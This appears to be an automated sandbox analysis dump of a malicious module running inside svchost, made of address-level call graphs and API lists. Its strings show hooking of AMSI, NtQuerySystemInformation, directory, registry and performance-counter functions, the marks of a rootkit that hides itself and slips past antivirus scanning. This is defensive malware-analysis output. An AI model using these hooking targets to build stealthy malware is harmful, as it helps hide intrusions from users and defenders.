22f4b9294ec 9296->9307 9298 22f4b92a158 19 API calls 9298->9299 9299->9291 9299->9298 9300 22f4b9299cc 9 API calls Is_bad_exception_allowed 9299->9300 9300->9299 9302 22f4b929634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 9301->9302 9303 22f4b929dc7 9302->9303 9303->9242 9303->9243 9305 22f4b929634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 9304->9305 9306 22f4b929e06 9305->9306 9306->9245 9308 22f4b929324 _CreateFrameInfo 9 API calls 9307->9308 9309 22f4b929518 9308->9309 9309->9299 8121 22f4b934611 __scrt_dllmain_exception_filter 8681 22f4b92c510 8682 22f4b92c518 8681->8682 8683 22f4b92c545 8682->8683 8685 22f4b92c574 8682->8685 8686 22f4b92c59f 8685->8686 8687 22f4b92c582 DeleteCriticalSection 8686->8687 8688 22f4b92c5a3 8686->8688 8687->8686 8688->8683 8122 22f4b92c218 8123 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8122->8123 8124 22f4b92c228 8123->8124 8125 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8124->8125 8126 22f4b92c23c 8125->8126 8127 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8126->8127 8128 22f4b92c250 8127->8128 8129 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8128->8129 8130 22f4b92c264 8129->8130 8366 22f4b931398 8367 22f4b9313ae 8366->8367 8368 22f4b9313f5 8367->8368 8370 22f4b93140e 8367->8370 8369 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8368->8369 8371 22f4b9313fa 8369->8371 8372 22f4b931405 8370->8372 8374 22f4b92dd78 14 API calls 8370->8374 8375 22f4b92d04c 8371->8375 8374->8372 8378 22f4b92cef8 8375->8378 8379 22f4b92cf23 8378->8379 8386 22f4b92cf94 8379->8386 8381 22f4b92cf4a 8382 22f4b92cf6d 8381->8382 8396 22f4b92c3e0 8381->8396 8384 22f4b92cf82 8382->8384 8385 22f4b92c3e0 _invalid_parameter_noinfo 17 API calls 8382->8385 8384->8372 8385->8384 8409 22f4b92ccc8 8386->8409 8391 22f4b92cfcf 8391->8381 8397 22f4b92c3ef GetLastError 8396->8397 8398 22f4b92c438 8396->8398 8399 22f4b92c404 8397->8399 8398->8382 8400 22f4b92cba0 _invalid_parameter_noinfo 14 API calls 8399->8400 8401 22f4b92c41e SetLastError 8400->8401 8401->8398 8402 22f4b92c441 8401->8402 8403 22f4b92c3e0 _invalid_parameter_noinfo 15 API calls 8402->8403 8404 22f4b92c467 8403->8404 8435 22f4b92ffe8 8404->8435 8410 22f4b92cd1f 8409->8410 8411 22f4b92cce4 GetLastError 8409->8411 8410->8391 8415 22f4b92cd34 8410->8415 8412 22f4b92ccf4 8411->8412 8422 22f4b92cba0 8412->8422 8416 22f4b92cd50 GetLastError SetLastError 8415->8416 8417 22f4b92cd68 8415->8417 8416->8417 8417->8391 8418 22f4b92d06c IsProcessorFeaturePresent 8417->8418 8419 22f4b92d07f 8418->8419 8427 22f4b92cd80 8419->8427 8423 22f4b92cbc8 FlsGetValue 8422->8423 8425 22f4b92cbc4 8422->8425 8423->8425 8424 22f4b92cbde SetLastError 8424->8410 8425->8424 8426 22f4b92c940 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8425->8426 8426->8424 8428 22f4b92cdba _invalid_parameter_noinfo 8427->8428 8429 22f4b92cde2 RtlCaptureContext RtlLookupFunctionEntry 8428->8429 8430 22f4b92ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8429->8430 8431 22f4b92ce2e RtlVirtualUnwind 8429->8431 8432 22f4b92ceb6 _invalid_parameter_noinfo 8430->8432 8431->8430 8433 22f4b928070 _invalid_parameter_noinfo 8 API calls 8432->8433 8434 22f4b92ced5 GetCurrentProcess TerminateProcess 8433->8434 8436 22f4b930001 8435->8436 8437 22f4b92c48f 8435->8437 8436->8437 8438 22f4b930a40 _invalid_parameter_noinfo 14 API calls 8436->8438 8439 22f4b930054 8437->8439 8438->8437 8440 22f4b92c49f 8439->8440 8441 22f4b93006d 8439->8441 8440->8382 8441->8440 8442 22f4b92e8c4 _invalid_parameter_noinfo 14 API calls 8441->8442 8442->8440 8689 22f4b922518 GetProcessIdOfThread GetCurrentProcessId 8690 22f4b922543 CreateFileW 8689->8690 8691 22f4b9225be 8689->8691 8690->8691 8692 22f4b922577 WriteFile ReadFile CloseHandle 8690->8692 8692->8691 8443 22f4b93479d 8446 22f4b92af34 8443->8446 8447 22f4b92af4e 8446->8447 8449 22f4b92af9b 8446->8449 8448 22f4b929324 _CreateFrameInfo 9 API calls 8447->8448 8447->8449 8448->8449 8450 22f4b9347c2 8451 22f4b929978 __CxxCallCatchBlock 9 API calls 8450->8451 8454 22f4b9347d5 8451->8454 8452 22f4b934814 __CxxCallCatchBlock 8453 22f4b929324 _CreateFrameInfo 9 API calls 8452->8453 8455 22f4b934828 8453->8455 8454->8452 8457 22f4b928ff8 __CxxCallCatchBlock 9 API calls 8454->8457 8456 22f4b929324 _CreateFrameInfo 9 API calls 8455->8456 8458 22f4b934838 8456->8458 8457->8452 8131 22f4b92ae42 8144 22f4b929324 8131->8144 8133 22f4b92ae93 RaiseException 8134 22f4b92aeba 8133->8134 8147 22f4b929978 8134->8147 8135 22f4b92ae4f __CxxCallCatchBlock 8135->8133 8137 22f4b92aeeb __CxxCallCatchBlock 8138 22f4b929324 _CreateFrameInfo 9 API calls 8137->8138 8139 22f4b92aefe 8138->8139 8141 22f4b929324 _CreateFrameInfo 9 API calls 8139->8141 8143 22f4b92af07 8141->8143 8145 22f4b929340 _CreateFrameInfo 9 API calls 8144->8145 8146 22f4b92932d 8145->8146 8146->8135 8148 22f4b929324 _CreateFrameInfo 9 API calls 8147->8148 8149 22f4b92998a 8148->8149 8150 22f4b9299c5 8149->8150 8151 22f4b929324 _CreateFrameInfo 9 API calls 8149->8151 8152 22f4b929995 8151->8152 8152->8150 8153 22f4b929324 _CreateFrameInfo 9 API calls 8152->8153 8154 22f4b9299b6 8153->8154 8154->8137 8155 22f4b928ff8 8154->8155 8156 22f4b929324 _CreateFrameInfo 9 API calls 8155->8156 8157 22f4b929006 8156->8157 8157->8137 8158 22f4b92f440 GetProcessHeap 8693 22f4b92ff40 8694 22f4b92ff4b 8693->8694 8702 22f4b932c24 8694->8702 8715 22f4b92c558 EnterCriticalSection 8702->8715 8459 22f4b9281c0 8460 22f4b9281c9 __scrt_acquire_startup_lock 8459->8460 8461 22f4b9281cd 8460->8461 8463 22f4b92bbb4 8460->8463 8464 22f4b92bbd4 8463->8464 8465 22f4b92bbed 8463->8465 8466 22f4b92bbf2 8464->8466 8467 22f4b92bbdc 8464->8467 8465->8461 8468 22f4b92e864 56 API calls 8466->8468 8469 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8467->8469 8470 22f4b92bbf7 8468->8470 8471 22f4b92bbe1 8469->8471 8492 22f4b92df38 GetModuleFileNameW 8470->8492 8473 22f4b92d04c _invalid_parameter_noinfo 38 API calls 8471->8473 8473->8465 8479 22f4b92bc7a 8481 22f4b92b994 14 API calls 8479->8481 8480 22f4b92bc69 8482 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8480->8482 8484 22f4b92bc96 8481->8484 8491 22f4b92bc6e 8482->8491 8483 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8483->8465 8485 22f4b92bcdf 8484->8485 8486 22f4b92bcc6 8484->8486 8484->8491 8489 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8485->8489 8487 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8486->8487 8488 22f4b92bccf 8487->8488 8490 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8488->8490 8489->8491 8490->8465 8491->8483 8493 22f4b92df91 8492->8493 8494 22f4b92df7d GetLastError 8492->8494 8496 22f4b92dd78 14 API calls 8493->8496 8516 22f4b92d184 8494->8516 8497 22f4b92dfbf 8496->8497 8498 22f4b92dfd0 8497->8498 8521 22f4b92f198 8497->8521 8525 22f4b92de1c 8498->8525 8500 22f4b928070 _invalid_parameter_noinfo 8 API calls 8501 22f4b92bc0e 8500->8501 8504 22f4b92b994 8501->8504 8503 22f4b92df8a 8503->8500 8507 22f4b92b9d2 8504->8507 8506 22f4b92ba38 8508 22f4b92bb25 8506->8508 8509 22f4b92ec1c 14 API calls 8506->8509 8507->8506 8542 22f4b92ec1c 8507->8542 8510 22f4b92bb54 8508->8510 8509->8506 8511 22f4b92bba4 8510->8511 8512 22f4b92bb6c 8510->8512 8511->8479 8511->8480 8512->8511 8513 22f4b92d220 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8512->8513 8514 22f4b92bb9a 8513->8514 8515 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8514->8515 8515->8511 8539 22f4b92d1d0 8516->8539 8518 22f4b92d191 Concurrency::details::SchedulerProxy::DeleteThis 8519 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8518->8519 8520 22f4b92d1a1 8519->8520 8520->8503 8522 22f4b92f1ca 8521->8522 8523 22f4b92f1a9 8521->8523 8522->8498 8523->8522 8524 22f4b92ef88 9 API calls 8523->8524 8524->8522 8526 22f4b92de5b 8525->8526 8529 22f4b92de40 8525->8529 8527 22f4b92de60 8526->8527 8528 22f4b92ece8 WideCharToMultiByte 8526->8528 8527->8529 8530 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8527->8530 8531 22f4b92deb7 8528->8531 8529->8503 8530->8529 8531->8527 8532 22f4b92debe GetLastError 8531->8532 8534 22f4b92dee9 8531->8534 8533 22f4b92d184 13 API calls 8532->8533 8536 22f4b92decb 8533->8536 8535 22f4b92ece8 WideCharToMultiByte 8534->8535 8537 22f4b92df10 8535->8537 8538 22f4b92d1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8536->8538 8537->8529 8537->8532 8538->8529 8540 22f4b92cb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8539->8540 8541 22f4b92d1d9 8540->8541 8541->8518 8543 22f4b92eba8 8542->8543 8544 22f4b92dd78 14 API calls 8543->8544 8545 22f4b92ebcc 8544->8545 8545->8507 7454 22f4b921bc4 7461 22f4b921724 GetProcessHeap HeapAlloc 7454->7461 7456 22f4b921bda SleepEx 7457 22f4b921724 50 API calls 7456->7457 7459 22f4b921bd3 7457->7459 7459->7456 7460 22f4b92159c StrCmpIW StrCmpW 7459->7460 7512 22f4b9219b0 7459->7512 7460->7459 7529 22f4b921264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7461->7529 7463 22f4b92174c 7530 22f4b921000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7463->7530 7465 22f4b921754 7531 22f4b921264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7465->7531 7467 22f4b92175d 7532 22f4b921264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7467->7532 7469 22f4b921766 7533 22f4b921264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7469->7533 7471 22f4b92176f 7534 22f4b921000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7471->7534 7473 22f4b921778 7535 22f4b921000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7473->7535 7475 22f4b921781 7536 22f4b921000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7475->7536 7477 22f4b92178a RegOpenKeyExW 7478 22f4b9219a2 7477->7478 7479 22f4b9217bc RegOpenKeyExW 7477->7479 7478->7459 7480 22f4b9217e5 7479->7480 7481 22f4b9217fb RegOpenKeyExW 7479->7481 7537 22f4b9212b8 RegQueryInfoKeyW 7480->7537 7483 22f4b92181f 7481->7483 7484 22f4b921836 RegOpenKeyExW 7481->7484 7546 22f4b92104c RegQueryInfoKeyW 7483->7546 7487 22f4b921871 RegOpenKeyExW 7484->7487 7488 22f4b92185a 7484->7488 7490 22f4b921895 7487->7490 7491 22f4b9218ac RegOpenKeyExW 7487->7491 7489 22f4b9212b8 16 API calls 7488->7489 7493 22f4b921867 RegCloseKey 7489->7493 7494 22f4b9212b8 16 API calls 7490->7494 7495 22f4b9218d0 7491->7495 7496 22f4b9218e7 RegOpenKeyExW 7491->7496 7493->7487 7497 22f4b9218a2 RegCloseKey 7494->7497 7498 22f4b9212b8 16 API calls 7495->7498 7499 22f4b921922 RegOpenKeyExW 7496->7499 7500 22f4b92190b 7496->7500 7497->7491 7501 22f4b9218dd RegCloseKey 7498->7501 7503 22f4b921946 7499->7503 7504 22f4b92195d RegOpenKeyExW 7499->7504 7502 22f4b92104c 6 API calls 7500->7502 7501->7496 7508 22f4b921918 RegCloseKey 7502->7508 7505 22f4b92104c 6 API calls 7503->7505 7506 22f4b921981 7504->7506 7507 22f4b921998 RegCloseKey 7504->7507 7509 22f4b921953 RegCloseKey 7505->7509 7510 22f4b92104c 6 API calls 7506->7510 7507->7478 7508->7499 7509->7504 7511 22f4b92198e RegCloseKey 7510->7511 7511->7507 7556 22f4b9214a0 7512->7556 7529->7463 7530->7465 7531->7467 7532->7469 7533->7471 7534->7473 7535->7475 7536->7477 7538 22f4b921486 RegCloseKey 7537->7538 7539 22f4b921323 GetProcessHeap HeapAlloc 7537->7539 7538->7481 7540 22f4b921472 GetProcessHeap HeapFree 7539->7540 7541 22f4b92134e RegEnumValueW 7539->7541 7540->7538 7542 22f4b9213a1 7541->7542 7542->7540 7542->7541 7544 22f4b9213cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7542->7544 7545 22f4b92141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7542->7545 7551 22f4b921530 7542->7551 7544->7545 7545->7542 7547 22f4b9210bf 7546->7547 7548 22f4b9211b5 RegCloseKey 7546->7548 7547->7548 7549 22f4b9210cf RegEnumValueW 7547->7549 7550 22f4b92114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7547->7550 7548->7484 7549->7547 7550->7547 7554 22f4b921580 7551->7554 7555 22f4b92154a 7551->7555 7552 22f4b921561 StrCmpIW 7552->7555 7553 22f4b921569 StrCmpW 7553->7555 7554->7542 7555->7552 7555->7553 7555->7554 7557 22f4b9214e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7556->7557 7558 22f4b9214c2 GetProcessHeap HeapFree 7556->7558 7558->7557 7558->7558 8159 22f4b934848 8162 22f4b92904c 8159->8162 8163 22f4b929076 8162->8163 8164 22f4b929064 8162->8164 8166 22f4b929324 _CreateFrameInfo 9 API calls 8163->8166 8164->8163 8165 22f4b92906c 8164->8165 8168 22f4b929324 _CreateFrameInfo 9 API calls 8165->8168 8171 22f4b929074 8165->8171 8167 22f4b92907b 8166->8167 8169 22f4b929324 _CreateFrameInfo 9 API calls 8167->8169 8167->8171 8170 22f4b92909b 8168->8170 8169->8171 8172 22f4b929324 _CreateFrameInfo 9 API calls 8170->8172 8173 22f4b9290a8 8172->8173 8174 22f4b92c2f4 14 API calls 8173->8174 8175 22f4b9290b1 8174->8175 8176 22f4b92c2f4 14 API calls 8175->8176 8177 22f4b9290bd 8176->8177 8716 22f4b92ad48 8717 22f4b929324 _CreateFrameInfo 9 API calls 8716->8717 8718 22f4b92ad7d 8717->8718 8719 22f4b929324 _CreateFrameInfo 9 API calls 8718->8719 8720 22f4b92ad8b __except_validate_context_record 8719->8720 8721 22f4b929324 _CreateFrameInfo 9 API calls 8720->8721 8722 22f4b92adcf 8721->8722 8723 22f4b929324 _CreateFrameInfo 9 API calls 8722->8723 8724 22f4b92add8 8723->8724 8725 22f4b929324 _CreateFrameInfo 9 API calls 8724->8725 8726 22f4b92ade1 8725->8726 8739 22f4b92993c 8726->8739 8729 22f4b929324 _CreateFrameInfo 9 API calls 8730 22f4b92ae11 __CxxCallCatchBlock 8729->8730 8731 22f4b929978 __CxxCallCatchBlock 9 API calls 8730->8731 8735 22f4b92aec2 8731->8735 8732 22f4b92aeeb __CxxCallCatchBlock 8733 22f4b929324 _CreateFrameInfo 9 API calls 8732->8733 8734 22f4b92aefe 8733->8734 8736 22f4b929324 _CreateFrameInfo 9 API calls 8734->8736 8735->8732 8737 22f4b928ff8 __CxxCallCatchBlock 9 API calls 8735->8737 8738 22f4b92af07 8736->8738 8737->8732 8740 22f4b929324 _CreateFrameInfo 9 API calls 8739->8740 8741 22f4b92994d 8740->8741 8742 22f4b929958 8741->8742 8743 22f4b929324 _CreateFrameInfo 9 API calls 8741->8743 8744 22f4b929324 _CreateFrameInfo 9 API calls 8742->8744 8743->8742 8745 22f4b929969 8744->8745 8745->8729 8745->8730 8178 22f4b92824c 8180 22f4b928270 __scrt_acquire_startup_lock 8178->8180 8179 22f4b92b581 8180->8179 8181 22f4b92cb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8180->8181 8182 22f4b92b5aa 8181->8182 8546 22f4b925fcc 8547 22f4b925fd3 8546->8547 8548 22f4b926000 VirtualProtect 8547->8548 8550 22f4b925f10 8547->8550 8549 22f4b926029 GetLastError 8548->8549 8548->8550 8549->8550 8183 22f4b92ec30 GetCommandLineA GetCommandLineW 8184 22f4b926430 8185 22f4b92643d 8184->8185 8186 22f4b926449 8185->8186 8191 22f4b92655a 8185->8191 8187 22f4b9264cd 8186->8187 8188 22f4b9264a6 SetThreadContext 8186->8188 8188->8187 8189 22f4b926581 VirtualProtect FlushInstructionCache 8189->8191 8190 22f4b92663e 8192 22f4b92665e 8190->8192 8194 22f4b924b20 VirtualFree 8190->8194 8191->8189 8191->8190 8193 22f4b925530 3 API calls 8192->8193 8197 22f4b926663 8193->8197 8194->8192 8195 22f4b9266b7 8198 22f4b928070 _invalid_parameter_noinfo 8 API calls 8195->8198 8196 22f4b926677 ResumeThread 8196->8197 8197->8195 8197->8196 8199 22f4b9266ff 8198->8199 8746 22f4b92bd34 8747 22f4b92bd4d 8746->8747 8756 22f4b92bd49 8746->8756 8748 22f4b92e864 56 API calls 8747->8748 8749 22f4b92bd52 8748->8749 8761 22f4b92edc8 GetEnvironmentStringsW 8749->8761 8752 22f4b92bd5f 8754 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8752->8754 8753 22f4b92bd6b 8781 22f4b92bda8 8753->8781 8754->8756 8758 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8759 22f4b92bd92 8758->8759 8760 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8759->8760 8760->8756 8762 22f4b92bd57 8761->8762 8763 22f4b92edf8 8761->8763 8762->8752 8762->8753 8764 22f4b92ece8 WideCharToMultiByte 8763->8764 8766 22f4b92ee49 8764->8766 8765 22f4b92ee53 FreeEnvironmentStringsW 8765->8762 8766->8765 8767 22f4b92c5d0 14 API calls 8766->8767 8768 22f4b92ee63 8767->8768 8769 22f4b92ee74 8768->8769 8770 22f4b92ee6b 8768->8770 8771 22f4b92ece8 WideCharToMultiByte 8769->8771 8772 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8770->8772 8773 22f4b92ee97 8771->8773 8774 22f4b92ee72 8772->8774 8775 22f4b92eea5 8773->8775 8776 22f4b92ee9b 8773->8776 8774->8765 8778 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8775->8778 8777 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8776->8777 8779 22f4b92eea3 FreeEnvironmentStringsW 8777->8779 8778->8779 8779->8762 8782 22f4b92bdcd 8781->8782 8783 22f4b92d220 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8782->8783 8795 22f4b92be03 8783->8795 8784 22f4b92be0b 8785 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8784->8785 8787 22f4b92bd73 8785->8787 8786 22f4b92be6d 8788 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8786->8788 8787->8758 8788->8787 8789 22f4b92d220 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8789->8795 8790 22f4b92be92 8792 22f4b92bebc 13 API calls 8790->8792 8791 22f4b92c328 __std_exception_copy 38 API calls 8791->8795 8793 22f4b92be9a 8792->8793 8796 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8793->8796 8794 22f4b92bea6 8797 22f4b92d06c _invalid_parameter_noinfo 17 API calls 8794->8797 8795->8784 8795->8786 8795->8789 8795->8790 8795->8791 8795->8794 8798 22f4b92d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8795->8798 8796->8784 8799 22f4b92beb9 8797->8799 8798->8795 9310 22f4b922ab4 TlsGetValue TlsGetValue TlsGetValue 9311 22f4b922b0d 9310->9311 9316 22f4b922b79 9310->9316 9313 22f4b922b15 9311->9313 9311->9316 9312 22f4b922b74 9313->9312 9314 22f4b922c32 TlsSetValue TlsSetValue TlsSetValue 9313->9314 9315 22f4b923f88 StrCmpNIW 9313->9315 9314->9312 9315->9313 9316->9312 9316->9314 9317 22f4b923f88 StrCmpNIW 9316->9317 9317->9316 9318 22f4b9234b8 9319 22f4b9234e8 9318->9319 9320 22f4b9235a1 9319->9320 9321 22f4b923505 PdhGetCounterInfoW 9319->9321 9321->9320 9322 22f4b923523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 9321->9322 9323 22f4b923555 StrCmpW 9322->9323 9324 22f4b92358d GetProcessHeap HeapFree 9322->9324 9323->9324 9326 22f4b92356a 9323->9326 9324->9320 9325 22f4b923950 12 API calls 9325->9326 9326->9324 9326->9325 7559 22f4b921e3c LoadLibraryA GetProcAddress 7560 22f4b921e62 SleepEx 7559->7560 7561 22f4b921e6f 7559->7561 7560->7560

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: 56b6ef7aae2003b2666995d73d3f8da4165ef61dab3b018a8c9eb3aa42e26a65
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: 9351A568D14A56B5FB88FFE5EE787D73730A708345F845932960902563DEFC82AAC390

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction ID: b847adb62990c8b4585e741d70a7157698aa1bc9e67df0a6988a8ea5b1f4b2bb
                                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction Fuzzy Hash: BB41AF36A14B80DAE7A4DFA1E55839A77B1F388B88F008135DB8907759DF7CC595CB00

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_22f4b920000_svchost.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: 2707e0eff7b1b9e8f61abd333ff2ec4983dee57ae7fd51a1eb0f6ce0dd1bda2b
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: 50D06228E11A40F5F9CD7FD1DEBD35622716B5CB01FC45835C70E01262DEAD8569C341

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32 ref: 0000022F4B923A35
                                                  • PathFindFileNameW.SHLWAPI ref: 0000022F4B923A44
                                                    • Part of subcall function 0000022F4B923F88: StrCmpNIW.KERNELBASE(?,?,?,0000022F4B92272F), ref: 0000022F4B923FA0
                                                    • Part of subcall function 0000022F4B923EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923EDB
                                                    • Part of subcall function 0000022F4B923EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F0E
                                                    • Part of subcall function 0000022F4B923EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F2E
                                                    • Part of subcall function 0000022F4B923EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F47
                                                    • Part of subcall function 0000022F4B923EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022F4B923A5B), ref: 0000022F4B923F68
                                                  • CreateThread.KERNELBASE ref: 0000022F4B923A8B
                                                    • Part of subcall function 0000022F4B921E74: GetCurrentThread.KERNEL32 ref: 0000022F4B921E7F
                                                    • Part of subcall function 0000022F4B921E74: CreateThread.KERNELBASE ref: 0000022F4B922043
                                                    • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922049
                                                    • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922055
                                                    • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922061
                                                    • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B92206D
                                                    • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922079
                                                    • Part of subcall function 0000022F4B921E74: TlsAlloc.KERNEL32 ref: 0000022F4B922085
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.3355105286.0000022F4B921000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                  • Associated: 00000011.00000002.3354416817.0000022F4B920000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3355926032.0000022F4B935000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3356680592.0000022F4B940000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3357400152.0000022F4B942000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000011.00000002.3358068813.0000022F4B949000.00000002.00000001.00020000.00000000.sdmpDownload File
